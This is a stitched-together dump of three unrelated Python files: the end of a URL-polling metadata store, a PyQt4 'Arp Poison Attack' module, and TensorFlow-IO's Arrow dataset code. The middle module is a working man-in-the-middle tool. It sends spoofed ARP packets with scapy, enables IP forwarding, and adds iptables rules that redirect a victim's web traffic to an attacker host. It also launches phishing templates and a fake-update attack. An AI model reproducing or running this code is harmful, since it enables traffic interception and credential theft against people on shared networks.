This method is normally called from the polling thread, but can be called
by other code when needed. It locks the metadata index whilst performing
the update.
"""
url = self.root_url + self.query_path
with self._index_lock:
result = self._opener.open(url)
# Py3: http.client.HTTPResponse always returns bytes --> convert to
# str/unicode to make sure loads is happy
index = json.loads(result.read().decode('ascii'))
old_index = self._index
self._index = index
# emit update events
# XXX won't detect changes to data if metadata doesn't change as well!
if old_index is not None:
old_keys = set(old_index)
new_keys = set(index)
for key in (old_keys - new_keys):
self.event_manager.emit(
StoreDeleteEvent(
self, key=key, metadata=old_index[key]))
for key in (new_keys - old_keys):
self.event_manager.emit(
StoreSetEvent(
self, key=key, metadata=index[key]))
for key in (new_keys & old_keys):
if old_index[key] != index[key]:
self.event_manager.emit(
StoreUpdateEvent(
self, key=key, metadata=index[key]))
##########################################################################
# Private Methods
##########################################################################
def _poll(self):
t = time.time()
while self._opener is not None:
if time.time() - t >= self.poll:
self.update_index()
t = time.time()
# tick
time.sleep(0.5)
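# A minimal usage sketch (commented out). The URLs mirror the layout described in the class
# docstring; the credentials dict and the 'name' metadata key are illustrative assumptions.
#
# store = StaticURLStore('http://www.example.com/', 'data/', 'index.json', poll=300)
# store.connect(credentials={'username': 'user', 'password': 'secret'})
# print(list(store.query_keys(name='example')))   # keys whose metadata has name == 'example'
# with store.get_data('key1') as stream:
#     payload = stream.read()
# store.disconnect()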
|
ModuleArpPosion.py
|
#The MIT License (MIT)
#Copyright (c) 2015-2016 mh4x0f P0cL4bs Team
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from Core.Settings import frm_Settings
from Modules.ModuleUpdateFake import frm_update_attack
from Modules.ModuleTemplates import frm_template
from Modules.utils import ProcessThread,Refactor,ThreadScan
from os import popen,chdir,getcwd,getuid,devnull,system
from scapy.all import *
import threading
from urllib2 import urlopen,URLError
from re import search,compile
from multiprocessing import Process,Manager
from time import sleep
threadloading = {'template':[],'posion':[]}
class frm_Arp(QMainWindow):
def __init__(self, parent=None):
super(frm_Arp, self).__init__(parent)
self.form_widget = frm_Arp_Poison(self)
self.setCentralWidget(self.form_widget)
class ThreadAttackPosion(QThread):
def __init__(self,victim,gateway,mac):
QThread.__init__(self)
self.victim = victim
self.gateway = gateway
self.mac = mac
self.process = True
def run(self):
print 'Starting Thread:' + self.objectName()
while self.process:
arp = ARP(op=1,psrc=self.gateway,pdst=self.victim,hwdst=self.mac)
send(arp,verbose=False)
sleep(2)
def stop(self):
self.process = False
print 'Stop thread:' + self.objectName()
self.emit(SIGNAL('Activated( QString )'),'Ok')
class frm_Arp_Poison(QWidget):
def __init__(self, parent=None):
super(frm_Arp_Poison, self).__init__(parent)
self.setWindowTitle('Arp Poison Attack')
self.setWindowIcon(QIcon('rsc/icon.ico'))
self.Main = QVBoxLayout()
self.owd = getcwd()
self.control = False
self.interfaces = Refactor.get_interfaces()
self.configure = frm_Settings()
self.loadtheme(self.configure.XmlThemeSelected())
self.module_network = Refactor
self.data = {'IPaddress':[], 'Hostname':[], 'MacAddress':[]}
self.ThreadDirc = {'Arp_posion':[]}
global threadloading
self.GUI()
def closeEvent(self, event):
if (len(self.ThreadDirc['Arp_posion']) != 0) or len(threadloading['template']) !=0:
reply = QMessageBox.question(self, 'About Exit','Are you sure you want to close ArpPoison?', QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
if getuid() == 0:
try:
for i in self.ThreadDirc['Arp_posion']:
i.stop(),i.join()
for i in threadloading['template']:
i.stop(),i.join()
threadloading['template'] = []
except:pass
self.deleteLater()
else:
pass
else:
event.ignore()
def loadtheme(self,theme):
sshFile=("Core/%s.qss"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
def GUI(self):
self.form =QFormLayout()
self.movie = QMovie('rsc/loading2.gif', QByteArray(), self)
size = self.movie.scaledSize()
self.setGeometry(200, 200, size.width(), size.height())
self.movie_screen = QLabel()
self.movie_screen.setFixedHeight(200)
self.movie_screen.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.movie_screen.setAlignment(Qt.AlignCenter)
self.movie.setCacheMode(QMovie.CacheAll)
self.movie.setSpeed(100)
self.movie_screen.setMovie(self.movie)
self.movie_screen.setDisabled(False)
self.movie.start()
self.tables = QTableWidget(5,3)
self.tables.setRowCount(100)
self.tables.setFixedHeight(200)
self.tables.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tables.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.tables.clicked.connect(self.list_clicked_scan)
self.tables.resizeColumnsToContents()
self.tables.resizeRowsToContents()
self.tables.horizontalHeader().resizeSection(1,120)
self.tables.horizontalHeader().resizeSection(0,145)
self.tables.horizontalHeader().resizeSection(2,158)
self.tables.verticalHeader().setVisible(False)
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.txt_target = QLineEdit(self)
self.txt_gateway = QLineEdit(self)
self.txt_redirect = QLineEdit(self)
self.txt_mac = QLineEdit(self)
self.ip_range = QLineEdit(self)
self.txt_status_scan = QLabel('')
self.txt_statusarp = QLabel('')
self.txt_status_phishing = QLabel('')
self.StatusMonitor(False,'stas_scan')
self.StatusMonitor(False,'stas_arp')
self.StatusMonitor(False,'stas_phishing')
scan_range = self.configure.xmlSettings('scan','rangeIP',None,False)
self.ip_range.setText(scan_range)
self.btn_start_scanner = QPushButton('Scan')
self.btn_stop_scanner = QPushButton('Stop')
self.btn_Attack_Posion = QPushButton('Start Attack')
self.btn_Stop_Posion = QPushButton('Stop Attack')
self.btn_server = QPushButton('Templates')
self.btn_windows_update = QPushButton('Fake Update')
self.btn_server.setFixedHeight(22)
self.btn_stop_scanner.setFixedWidth(100)
self.btn_start_scanner.setFixedWidth(100)
self.btn_start_scanner.setFixedHeight(22)
self.btn_stop_scanner.setFixedHeight(22)
self.btn_windows_update.setFixedHeight(22)
self.btn_start_scanner.clicked.connect(self.Start_scan)
self.btn_stop_scanner.clicked.connect(self.Stop_scan)
self.btn_Attack_Posion.clicked.connect(self.Start_Attack)
self.btn_Stop_Posion.clicked.connect(self.kill_attack)
self.btn_server.clicked.connect(self.show_template_dialog)
self.btn_windows_update.clicked.connect(self.show_frm_fake)
#icons
self.btn_start_scanner.setIcon(QIcon('rsc/network.png'))
self.btn_Attack_Posion.setIcon(QIcon('rsc/start.png'))
self.btn_Stop_Posion.setIcon(QIcon('rsc/Stop.png'))
self.btn_stop_scanner.setIcon(QIcon('rsc/network_off.png'))
self.btn_server.setIcon(QIcon('rsc/page.png'))
self.btn_windows_update.setIcon(QIcon('rsc/winUp.png'))
self.grid0 = QGridLayout()
self.grid0.minimumSize()
self.grid0.addWidget(QLabel('ArpPosion:'),0,2)
self.grid0.addWidget(QLabel('Phishing:'),0,4)
self.grid0.addWidget(QLabel('Scanner:'),0,0)
self.grid0.addWidget(self.txt_status_scan,0,1)
self.grid0.addWidget(self.txt_statusarp,0,3)
self.grid0.addWidget(self.txt_status_phishing,0,5)
# grid options
self.grid1 = QGridLayout()
self.grid1.addWidget(self.btn_start_scanner,0,0)
self.grid1.addWidget(self.btn_stop_scanner,0,1)
self.grid1.addWidget(self.btn_server,0,2)
self.grid1.addWidget(self.btn_windows_update, 0,3)
#btn
self.grid2 = QGridLayout()
self.grid2.addWidget(self.btn_Attack_Posion,1,0)
self.grid2.addWidget(self.btn_Stop_Posion,1,5)
x = self.interfaces
if x['gateway'] != None:
self.txt_gateway.setText(x['gateway'])
self.txt_redirect.setText(x['IPaddress'])
self.txt_mac.setText(Refactor.getHwAddr(x['activated']))
self.form0 = QGridLayout()
self.form0.addWidget(self.movie_screen,0,0)
self.form0.addWidget(self.tables,0,0)
self.form.addRow(self.form0)
self.form.addRow(self.grid1)
self.form.addRow('Target:', self.txt_target)
self.form.addRow('Gateway:', self.txt_gateway)
self.form.addRow('MAC address:', self.txt_mac)
self.form.addRow('Redirect IP:', self.txt_redirect)
self.form.addRow('IP range to scan:',self.ip_range)
self.form.addRow(self.grid0)
self.form.addRow(self.grid2)
self.Main.addLayout(self.form)
self.setLayout(self.Main)
def thread_scan_reveice(self,info_ip):
self.StatusMonitor(False,'stas_scan')
self.movie_screen.setDisabled(False)
self.tables.setVisible(True)
data = info_ip.split('|')
Headers = []
self.data['IPaddress'].append(data[0])
self.data['MacAddress'].append(data[1])
self.data['Hostname'].append(data[2])
for n, key in enumerate(reversed(self.data.keys())):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
def show_frm_fake(self):
self.n = frm_update_attack()
self.n.setGeometry(QRect(100, 100, 450, 300))
self.n.show()
def emit_template(self,log):
if log == 'started':
self.StatusMonitor(True,'stas_phishing')
def show_template_dialog(self):
self.Ftemplates = frm_template()
self.connect(self.Ftemplates,SIGNAL('Activated ( QString ) '), self.emit_template)
self.Ftemplates.setWindowTitle('Templates Phishing Attack')
self.Ftemplates.txt_redirect.setText(self.txt_redirect.text())
self.Ftemplates.show()
def kill_attack(self):
for i in self.ThreadDirc['Arp_posion']:
i.stop()
for i in threadloading['template']:
i.stop(),i.join()
threadloading['template'] = []
try:
self.Ftemplates.killThread()
except:pass
chdir(self.owd)
self.StatusMonitor(False,'stas_arp')
self.StatusMonitor(False,'stas_phishing')
self.conf_attack(False)
Refactor.set_ip_forward(0)
@pyqtSlot(QModelIndex)
def check_options(self,index):
if self.check_face.isChecked():
self.check_route.setChecked(False)
self.check_gmail.setChecked(False)
elif self.check_gmail.isChecked():
self.check_face.setChecked(False)
self.check_route.setChecked(False)
else:
self.check_face.setChecked(False)
self.check_gmail.setChecked(False)
def StopArpAttack(self,data):
self.StatusMonitor(False,'stas_arp')
def Start_Attack(self):
if (len(self.txt_target.text()) and len(self.txt_mac.text()) and len(self.txt_gateway.text())) == 0:
QMessageBox.information(self, 'Error Arp Attacker', 'you need to set the input correctly')
else:
chdir(self.owd)
if (len(self.txt_target.text()) and len(self.txt_gateway.text())) and len(self.txt_mac.text()) != 0:
if len(self.txt_redirect.text()) != 0:
self.StatusMonitor(True,'stas_arp')
Refactor.set_ip_forward(1)
self.conf_attack(True)
thr = ThreadAttackPosion(str(self.txt_target.text()),
str(self.txt_gateway.text()),
str(self.txt_mac.text()))
self.connect(thr,SIGNAL('Activated ( QString ) '), self.StopArpAttack)
thr.setObjectName('Arp Posion')
self.ThreadDirc['Arp_posion'].append(thr)
thr.start()
def conf_attack(self,bool_conf):
if bool_conf:
self.ip = self.txt_redirect.text()
if len(self.ip) != 0:
iptables = [
'iptables -t nat --flush',
'iptables -A FORWARD --in-interface '+str(self.txt_gateway.text())+' -j ACCEPT',
'iptables -t nat --append POSTROUTING --out-interface ' +self.interfaces['activated'] +' -j MASQUERADE',
'iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination '+self.ip
]
for i in iptables:
try:system(i)
except:pass
else:
QMessageBox.information(self,'Error Redirect IP','Redirect IP not found')
else:
nano = [
'iptables --flush',
'iptables --table nat --flush' ,\
'iptables --delete-chain', 'iptables --table nat --delete-chain'
]
for delete in nano: popen(delete)
def Start_scan(self):
self.StatusMonitor(True,'stas_scan')
threadscan_check = self.configure.xmlSettings('advanced','Function_scan',None,False)
self.tables.clear()
self.data = {'IPaddress':[], 'Hostname':[], 'MacAddress':[]}
if threadscan_check == 'Nmap':
try:
from nmap import PortScanner
except ImportError:
QMessageBox.information(self,'Error Nmap','The python-nmap module is not installed')
return
if self.txt_gateway.text() != '':
self.movie_screen.setDisabled(True)
self.tables.setVisible(False)
config_gateway = str(self.txt_gateway.text())
scan = ''
config_gateway = config_gateway.split('.')
del config_gateway[-1]
for i in config_gateway:
scan += str(i) + '.'
self.ThreadScanner = ThreadScan(scan + '0/24')
self.connect(self.ThreadScanner,SIGNAL('Activated ( QString ) '), self.thread_scan_reveice)
self.StatusMonitor(True,'stas_scan')
self.ThreadScanner.start()
else:
QMessageBox.information(self,'Error in gateway','gateway not found.')
elif threadscan_check == 'Ping':
if self.txt_gateway.text() != '':
config = str(self.txt_gateway.text())
t = threading.Thread(target=self.scanner_network,args=(config,))
t.daemon = True
t.start(),t.join()
self.StatusMonitor(False,'stas_scan')
else:
QMessageBox.information(self,'Error in gateway','gateway not found.')
else:
QMessageBox.information(self,'Error selecting scan thread','scan thread not selected.')
def working(self,ip,lista):
with open(devnull, 'wb') as limbo:
result=subprocess.Popen(['ping', '-c', '1', '-n', '-W', '1', ip],
stdout=limbo, stderr=limbo).wait()
if not result:
print('online',ip)
lista[ip] = ip + '|' + self.module_network.get_mac(ip)
def scanner_network(self,gateway):
scan = ''
config_gateway = gateway.split('.')
del config_gateway[-1]
for i in config_gateway:
scan += str(i) + '.'
gateway = scan
ranger = str(self.ip_range.text()).split('-')
jobs = []
manager = Manager()
on_ips = manager.dict()
for n in xrange(int(ranger[0]),int(ranger[1])):
ip='%s{0}'.format(n)%(gateway)
p = Process(target=self.working,args=(ip,on_ips))
jobs.append(p)
p.start()
for i in jobs: i.join()
for i in on_ips.values():
Headers = []
n = i.split('|')
self.data['IPaddress'].append(n[0])
self.data['MacAddress'].append(n[1])
self.data['Hostname'].append('<unknown>')
for n, key in enumerate(reversed(self.data.keys())):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
def Stop_scan(self):
self.ThreadScanner.terminate()
self.StatusMonitor(False,'stas_scan')
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.tables.setVisible(True)
def StatusMonitor(self,bool,wid):
if bool and wid == 'stas_scan':
self.txt_status_scan.setText('[ ON ]')
self.txt_status_scan.setStyleSheet('QLabel { color : green; }')
elif not bool and wid == 'stas_scan':
self.txt_status_scan.setText('[ OFF ]')
self.txt_status_scan.setStyleSheet('QLabel { color : red; }')
elif bool and wid == 'stas_arp':
self.txt_statusarp.setText('[ ON ]')
self.txt_statusarp.setStyleSheet('QLabel { color : green; }')
elif not bool and wid == 'stas_arp':
self.txt_statusarp.setText('[ OFF ]')
self.txt_statusarp.setStyleSheet('QLabel { color : red; }')
elif bool and wid == 'stas_phishing':
self.txt_status_phishing.setText('[ ON ]')
self.txt_status_phishing.setStyleSheet('QLabel { color : green; }')
elif not bool and wid == 'stas_phishing':
self.txt_status_phishing.setText('[ OFF ]')
self.txt_status_phishing.setStyleSheet('QLabel { color : red; }')
@pyqtSlot(QModelIndex)
def list_clicked_scan(self, index):
item = self.tables.selectedItems()
if item != []:
self.txt_target.setText(item[0].text())
else:
self.txt_target.clear()
|
arrow_dataset_ops.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Arrow Dataset."""
from functools import partial
import io
from itertools import chain
import os
import socket
import threading
import tempfile
import tensorflow as tf
from tensorflow import dtypes
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import structure as structure_lib
from tensorflow_io.python.ops import core_ops
if hasattr(tf, "nest"):
from tensorflow import nest # pylint: disable=ungrouped-imports
else:
from tensorflow.python.data.util import nest # pylint: disable=ungrouped-imports
def arrow_to_tensor_type(pa_t):
"""Convert Arrow type to tuple of (Tensor dtype, shape dims).
This function requires pyarrow to be installed.
"""
import pyarrow as pa # pylint: disable=import-outside-toplevel
shape_dims = [] # initialize shape as scalar
if pa.types.is_boolean(pa_t):
tf_t = dtypes.bool
elif pa.types.is_int8(pa_t):
tf_t = dtypes.int8
elif pa.types.is_int16(pa_t):
tf_t = dtypes.int16
elif pa.types.is_int32(pa_t):
tf_t = dtypes.int32
elif pa.types.is_int64(pa_t):
tf_t = dtypes.int64
elif pa.types.is_uint8(pa_t):
tf_t = dtypes.uint8
elif pa.types.is_uint16(pa_t):
tf_t = dtypes.uint16
elif pa.types.is_uint32(pa_t):
tf_t = dtypes.uint32
elif pa.types.is_uint64(pa_t):
tf_t = dtypes.uint64
elif pa.types.is_float16(pa_t):
tf_t = dtypes.float16
elif pa.types.is_float32(pa_t):
tf_t = dtypes.float32
elif pa.types.is_float64(pa_t):
tf_t = dtypes.float64
elif pa.types.is_string(pa_t):
tf_t = dtypes.string
elif pa.types.is_list(pa_t):
if pa.types.is_list(pa_t.value_type):
raise TypeError("Nested arrays are not currently supported: " + str(pa_t))
tf_t, shape_dims = arrow_to_tensor_type(pa_t.value_type)
shape_dims.append(None) # pyarrow scalar arrays can be variable length
else:
raise TypeError("Unsupported type in conversion from Arrow: " + str(pa_t))
return tf_t, shape_dims
def arrow_schema_to_tensor_types(schema):
"""Convert an Arrow schema to tuple of (Tensor dtypes, TensorShapes).
This function requires pyarrow to be installed.
"""
type_shape_list = [arrow_to_tensor_type(field.type) for field in schema]
tensor_types, shape_dims = zip(*type_shape_list)
tensor_shapes = tuple(tf.TensorShape(s) for s in shape_dims)
return tensor_types, tensor_shapes
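# A minimal sketch (commented out) of the schema conversion helpers above; the record
# batch built here is purely illustrative and assumes pyarrow is installed.
#
# import pyarrow as pa
# batch = pa.RecordBatch.from_arrays([pa.array([1, 2, 3]), pa.array([0.1, 0.2, 0.3])],
#                                    names=["ints", "floats"])
# tensor_types, tensor_shapes = arrow_schema_to_tensor_types(batch.schema)
# # tensor_types -> (tf.int64, tf.float64); tensor_shapes -> (TensorShape([]), TensorShape([]))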
class ArrowBaseDataset(dataset_ops.DatasetV2):
"""Base class for Arrow Datasets to provide columns used in record batches
and corresponding output tensor types, shapes and classes.
"""
batch_modes_supported = ("keep_remainder", "drop_remainder", "auto")
def __init__(
self,
make_variant_fn,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode="keep_remainder",
):
self._columns = columns
self._structure = structure_lib.convert_legacy_structure(
output_types,
output_shapes
or nest.map_structure(lambda _: tf.TensorShape(None), output_types),
nest.map_structure(lambda _: tf.Tensor, output_types),
)
self._batch_size = tf.convert_to_tensor(
batch_size or 0, dtype=dtypes.int64, name="batch_size"
)
if batch_mode not in self.batch_modes_supported:
raise ValueError(
"Unsupported batch_mode: '{}', must be one of {}".format(
batch_mode, self.batch_modes_supported
)
)
self._batch_mode = tf.convert_to_tensor(
batch_mode, dtypes.string, name="batch_mode"
)
if batch_size is not None or batch_mode == "auto":
spec_batch_size = batch_size if batch_mode == "drop_remainder" else None
# pylint: disable=protected-access
self._structure = nest.map_structure(
lambda component_spec: component_spec._batch(spec_batch_size),
self._structure,
)
variant_tensor = make_variant_fn(
columns=self._columns,
batch_size=self._batch_size,
batch_mode=self._batch_mode,
**self._flat_structure,
)
super().__init__(variant_tensor)
def _inputs(self):
return []
@property
def element_spec(self):
return self._structure
@property
def columns(self):
return self._columns
@property
def batch_size(self):
return self._batch_size
@property
def batch_mode(self):
return self._batch_mode
class ArrowDataset(ArrowBaseDataset):
"""An Arrow Dataset from record batches in memory, or a Pandas DataFrame."""
def __init__(
self,
serialized_batches,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode="keep_remainder",
arrow_buffer=None,
):
"""Create an ArrowDataset from a Tensor of serialized batches.
This constructor requires pyarrow to be installed.
Args:
serialized_batches: A string Tensor as a serialized buffer containing
Arrow record batches in Arrow File format
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched Tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
arrow_buffer: Optional Arrow Buffer containing Arrow record batches in
Arrow File format. This will share the Arrow buffer with
the C++ kernel by address for zero-copy. Only supported if
the kernel process is local, with TensorFlow in eager mode.
If this is used, set `serialized_batches` to `None`.
"""
if serialized_batches is not None:
make_variant_fn = partial(
core_ops.io_arrow_serialized_dataset, serialized_batches
)
elif arrow_buffer is None:
raise ValueError("Must set either serialzied_batches or arrow_buffer")
elif not tf.executing_eagerly():
raise ValueError(
"Using arrow_buffer for zero-copy only supported in "
"TensorFlow Eager mode."
)
else:
address_int = arrow_buffer.address
buffer_address = tf.convert_to_tensor(
address_int, dtype=dtypes.uint64, name="buffer_address"
)
buffer_size = tf.convert_to_tensor(
arrow_buffer.size, dtype=dtypes.int64, name="buffer_size"
)
make_variant_fn = partial(
core_ops.io_arrow_zero_copy_dataset, buffer_address, buffer_size
)
# Keep a reference to the arrow buffers used
self._arrow_buffer_refs = [arrow_buffer]
super().__init__(
make_variant_fn,
columns,
output_types,
output_shapes,
batch_size,
batch_mode,
)
@classmethod
def from_record_batches(
cls,
record_batches,
output_types,
output_shapes=None,
columns=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an ArrowDataset directly from Arrow record batches.
This constructor requires pyarrow to be installed.
Args:
record_batches: An Arrow record batch or sequence of record batches
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
columns: A list of column indices to be used in the Dataset
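        Example (a minimal sketch; the column name "a" is hypothetical and
        pyarrow is assumed to be installed):
            import pyarrow as pa
            batch = pa.RecordBatch.from_arrays([pa.array([1, 2, 3])], ["a"])
            ds = ArrowDataset.from_record_batches(
                batch, output_types=(tf.int64,), output_shapes=(tf.TensorShape([]),)
            )
            # In eager mode the dataset can be iterated directly
            for row in ds:
                print(row)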
"""
import pyarrow as pa # pylint: disable=import-outside-toplevel
if isinstance(record_batches, pa.RecordBatch):
record_batches = [record_batches]
        assert record_batches
        if columns is None:
            columns = tuple(range(record_batches[0].num_columns))
if tf.executing_eagerly():
sink = pa.BufferOutputStream()
writer = pa.RecordBatchFileWriter(sink, record_batches[0].schema)
for batch in record_batches:
writer.write_batch(batch)
writer.close()
serialized_batches = None
arrow_buffer = sink.getvalue()
else:
buf = io.BytesIO()
writer = pa.RecordBatchFileWriter(buf, record_batches[0].schema)
for batch in record_batches:
writer.write_batch(batch)
writer.close()
serialized_batches = tf.convert_to_tensor(
buf.getvalue(), dtype=dtypes.string, name="serialized_batches"
)
arrow_buffer = None
return cls(
serialized_batches,
columns,
output_types,
output_shapes,
batch_size=batch_size,
batch_mode=batch_mode,
arrow_buffer=arrow_buffer,
)
@classmethod
def from_pandas(
cls,
df,
columns=None,
preserve_index=True,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an ArrowDataset from a given Pandas DataFrame. Output types
and shapes are inferred from the Arrow schema after DataFrame conversion.
If preserve_index is True, the DataFrame index will be the last column.
This method requires pyarrow to be installed.
Args:
df: a Pandas DataFrame
columns: Optional column indices to use, if None all are used
preserve_index: Flag to include the DataFrame index as the last column
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
import pyarrow as pa # pylint: disable=import-outside-toplevel
if columns is not None:
df = df.iloc[:, list(columns)]
batch = pa.RecordBatch.from_pandas(df, preserve_index=preserve_index)
columns = tuple(range(batch.num_columns))
output_types, output_shapes = arrow_schema_to_tensor_types(batch.schema)
return cls.from_record_batches(
batch,
output_types,
output_shapes,
columns=columns,
batch_size=batch_size,
batch_mode=batch_mode,
)
class ArrowFeatherDataset(ArrowBaseDataset):
"""An Arrow Dataset for reading record batches from Arrow feather files.
Feather is a light-weight columnar format ideal for simple writing of
Pandas DataFrames. Pyarrow can be used for reading/writing Feather files,
see https://arrow.apache.org/docs/python/ipc.html#feather-format
"""
def __init__(
self,
filenames,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an ArrowDataset from one or more Feather file names.
Args:
filenames: A `tf.string` tensor, Python list or scalar containing files
in Arrow Feather format
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
filenames = tf.convert_to_tensor(
filenames, dtype=dtypes.string, name="filenames"
)
super().__init__(
partial(core_ops.io_arrow_feather_dataset, filenames),
columns,
output_types,
output_shapes,
batch_size,
batch_mode,
)
@classmethod
def from_schema(
cls,
filenames,
schema,
columns=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an Arrow Dataset for reading record batches from Arrow feather
files, inferring output types and shapes from the given Arrow schema.
This method requires pyarrow to be installed.
Args:
filenames: A `tf.string` tensor, Python list or scalar containing files
in Arrow Feather format
schema: Arrow schema defining the record batch data in the stream
            columns: A list of column indices to use from the schema, None for all
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
if columns is None:
columns = list(range(len(schema)))
output_types, output_shapes = arrow_schema_to_tensor_types(schema)
return cls(
filenames, columns, output_types, output_shapes, batch_size, batch_mode
)
class ArrowStreamDataset(ArrowBaseDataset):
"""An Arrow Dataset for reading record batches from an input stream.
Currently supported input streams are a socket client or stdin.
"""
def __init__(
self,
endpoints,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an ArrowDataset from an input stream.
Args:
endpoints: A `tf.string` tensor, Python list or scalar string defining the
input stream.
`endpoints` supports the following formats:
- "host:port": IPv4 address (default)
- "tcp://<host:port>": IPv4 address,
- "unix://<path>": local path as unix socket address,
- "fd://<number>": STDIN or file descriptor number. For
STDIN, use "fd://0" or "fd://-".
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
endpoints = tf.convert_to_tensor(
endpoints, dtype=dtypes.string, name="endpoints"
)
super().__init__(
partial(core_ops.io_arrow_stream_dataset, endpoints),
columns,
output_types,
output_shapes,
batch_size,
batch_mode,
)
@classmethod
def from_schema(
cls,
endpoints,
schema,
columns=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an Arrow Dataset from an input stream, inferring output types
and shapes from the given Arrow schema.
This method requires pyarrow to be installed.
Args:
endpoints: A `tf.string` tensor, Python list or scalar string defining the
input stream.
`endpoints` supports the following formats:
- "host:port": IPv4 address (default)
- "tcp://<host:port>": IPv4 address,
- "unix://<path>": local path as unix socket address,
- "fd://<number>": STDIN or file descriptor number. For
STDIN, use "fd://0" or "fd://-".
schema: Arrow schema defining the record batch data in the stream
            columns: A list of column indices to use from the schema, None for all
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
if columns is None:
columns = list(range(len(schema)))
